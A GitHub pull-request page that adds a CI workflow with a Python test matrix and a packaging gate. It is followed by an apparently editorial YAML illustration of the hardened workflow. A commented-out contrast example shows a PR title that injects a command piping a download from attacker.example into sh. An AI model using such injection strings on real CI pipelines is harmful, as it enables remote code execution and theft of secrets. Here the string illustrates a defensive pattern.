
Ci: Add GitHub Actions workflow for tests + packaging gate 0.0.44#82

Merged
kickthemoon0817 merged 3 commits into main from feat/ci-workflow on May 5, 2026

Conversation

@kickthemoon0817 (Owner)

Summary

Closes the iter15 test-engineer minor finding (no CI workflow runs
the suite or packaging gate). Now meaningful with the post-iter20
100% green baseline.

Changes

  • .github/workflows/ci.yml (new):
    • unit-tests job: matrix across Python 3.11 / 3.12 / 3.13
      (the project's classifier set). Installs via
      uv pip install --system -e ".[dev]" to match local dev
      workflow. Runs pytest tests/ which the addopts default
      filters down to the fast unit lane (skipping packaging,
      isaac, unreal_live).
    • packaging-gate job: only runs on main + PRs to main since
      the uv-build-per-test pattern is the slowest job. Overrides
      the addopts default with -m packaging (pytest takes the
      LAST -m).
  • 4-file lockstep bumped to 0.0.44.

Security

The workflow only references trusted inputs
(matrix.python-version, github.ref, github.event_name)
and never interpolates user-controlled fields (issue title, PR
body, commit messages, head ref) into run: blocks. The
risky-input avoidance is documented inline at the top of the file.

How to Test

The PR push itself is the test — both jobs should appear under
"Checks" and run green.

Checklist

Testing

  • Local YAML validation passes.
  • Local pytest tests/ baseline confirmed (495 passed,
    0 failed, 6 skipped, 3 deselected).
  • Local pytest tests/packaging/ -m packaging baseline
    confirmed (3 passed in ~1.2s).
  • CI workflow run will be the live verification.

Compatibility

  • No source-code changes outside the new workflow file +
    4-file version bump.
  • No effect on local development workflows; the workflow
    only runs in GitHub Actions.

Documentation

  • Workflow comments document what each job does, why the
    packaging gate is conditional, and the security posture.

Commits

Closes the iter15 test-engineer minor finding (no CI workflow runs
the suite or the packaging gate). Now meaningful with the
post-iter20 100% green baseline.

Two jobs:

- unit-tests: matrix across Python 3.11 / 3.12 / 3.13 (the
  project's classifier set). Installs via uv to match local dev
  workflow. Runs 'pytest tests/' which the addopts default
  filters down to the fast unit lane (skipping packaging,
  isaac, unreal_live markers).
- packaging-gate: only runs on main + PRs to main since the
  uv-build-per-test pattern is the slowest job. Overrides the
  addopts default by passing '-m packaging' last (pytest takes
  the LAST -m).

Security: the workflow only references trusted inputs
(matrix.python-version, github.ref, github.event_name) and never
interpolates user-controlled fields (issue title, PR body, commit
messages, head ref) into run: blocks. The risky-input avoidance
is documented inline at the top of the file.

Code-reviewer found a HIGH (lockfile bypass) + 2 MEDIUM (double-runs,
missing permissions) on the iter22 CI workflow:

- HIGH: 'uv pip install --system -e .[dev]' bypasses the tracked
  uv.lock entirely, so CI resolves transitive deps fresh from PyPI
  on every run. A transitive-dep break would silently flip CI red
  unrelated to the PR. Switched to 'uv sync --extra dev' which
  reads uv.lock and pins all transitive versions to what local dev
  resolves. Test runs now use 'uv run pytest' to invoke pytest
  inside the synced project venv. Both jobs (unit-tests +
  packaging-gate) updated.
- MEDIUM: a contributor pushing to a feature branch with an open
  PR triggered both push + pull_request events, doubling the matrix
  run. Added a 'concurrency' group keyed on workflow + ref with
  'cancel-in-progress: true' — the stale push run is canceled the
  moment the PR event fires for the same ref.
- MEDIUM: GITHUB_TOKEN inherited the repo's default permissions
  (often write). Added top-level 'permissions: contents: read'
  since this is a read-only test workflow with no deployments,
  releases, or comments.

Plus 1 LOW addressed inline:

- Added a one-sentence note to the packaging-gate comment that a
  packaging-breaking change pushed to a feature branch without a
  PR will not be caught until the PR is created (the 'main + PRs'
  conditional intentionally trades that case for slowest-job
  cost).
- Removed the misleading 'CLAUDE.md tracks the canonical count'
  parenthetical — the count drifts as tests are added; pytest's
  own output is the canonical reference.

Two LOW items deferred to iter23+:

- SHA-pinning of action versions (actions/checkout@v4 etc.) — best
  practice for public repos but over-engineering for v0.0.x.
- Lint/type-check job (black/isort/flake8/mypy) — bigger scope
  improvement worth its own PR.
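The PR description (unit-tests matrix, packaging gate, trusted-input rule) and the review-fix commit (lockfile-driven install, concurrency group, read-only token) describe one workflow but the merged .github/workflows/ci.yml is not shown on this page. The following is an added illustration by the editor of how those pieces fit together, not the project's file. The action versions, the setup-python/setup-uv steps, the --locked flag, fail-fast: false, the packaging job's single interpreter, and the PR-title logging step are assumptions made to show the pattern; everything else follows the PR text.

```yaml
# .github/workflows/ci.yml (illustrative reconstruction, not the merged file)
name: CI

on:
  push:                       # every branch, so a feature-branch push still runs unit-tests
  pull_request:
    branches: [main]

# Read-only GITHUB_TOKEN for every job. Nothing here pushes, releases or
# comments, so the repo's default (often write) scope is pure attack surface.
permissions:
  contents: read

# A push to a branch with an open PR fires push and pull_request on the same
# ref; keying the group on workflow + ref cancels the older duplicate run.
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true

jobs:
  unit-tests:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false                  # assumption: let every matrix leg report
      matrix:
        python-version: ["3.11", "3.12", "3.13"]
    steps:
      # Tags, not SHAs: the PR defers SHA-pinning. For a public repo, replace
      # each @vN with the release's full commit SHA and keep the tag in a comment.
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.python-version }}
      - uses: astral-sh/setup-uv@v5

      # uv sync reads uv.lock and installs the pinned transitive set.
      # --locked (assumption, beyond the PR's command) fails the job when
      # uv.lock is out of date with pyproject.toml instead of quietly re-locking,
      # so a stale lockfile cannot reintroduce fresh-from-PyPI resolution.
      # matrix.python-version is workflow-defined data, safe to interpolate.
      - run: uv sync --locked --extra dev --python "${{ matrix.python-version }}"

      # addopts in pyproject.toml already deselects packaging/isaac/unreal_live.
      - run: uv run pytest tests/

      # UNSAFE pattern the PR description warns about, kept commented out for
      # contrast. ${{ }} is expanded into the script text before bash parses
      # it, so a PR title such as
      #     x"; curl https://attacker.example/p | sh; echo "
      # becomes a second command; quoting inside the run: line cannot help.
      #
      #   - run: echo "Testing PR: ${{ github.event.pull_request.title }}"
      #
      # SAFE form: bind the untrusted value to an environment variable. The
      # shell sees only a quoted variable reference and the title stays data.
      - name: Log PR title (assumed step, added to show the safe pattern)
        if: github.event_name == 'pull_request'
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: printf 'Testing PR: %s\n' "$PR_TITLE"

  packaging-gate:
    # Slowest job (uv build per test), so only on main and on PRs to main.
    # Caveat from the PR: a packaging-breaking push to a feature branch with
    # no open PR is not caught until the PR exists.
    if: github.ref == 'refs/heads/main' || github.event_name == 'pull_request'
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: "3.12"        # assumption: one interpreter for the gate
      - uses: astral-sh/setup-uv@v5
      - run: uv sync --locked --extra dev
      # pytest honours the LAST -m, so this overrides the addopts deselection.
      - run: uv run pytest tests/packaging/ -m packaging
```

Two caveats on the hardened settings. The concurrency group keyed on github.ref also applies to main, so two quick pushes to main cancel the first commit's run; if every main commit must keep a full result, use cancel-in-progress: ${{ github.ref != 'refs/heads/main' }} instead of true. The packaging-gate if: relies on pull_request being filtered to main under on:; drop that filter and PRs against any branch would run the gate too. The env: pattern shown for the PR title applies equally to github.head_ref, the PR body and commit messages, which the PR description rightly lists as user-controlled.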
kickthemoon0817 merged commit 53a398d into main on May 5, 2026. 8 checks passed.
kickthemoon0817 deleted the feat/ci-workflow branch on May 5, 2026 at 10:22.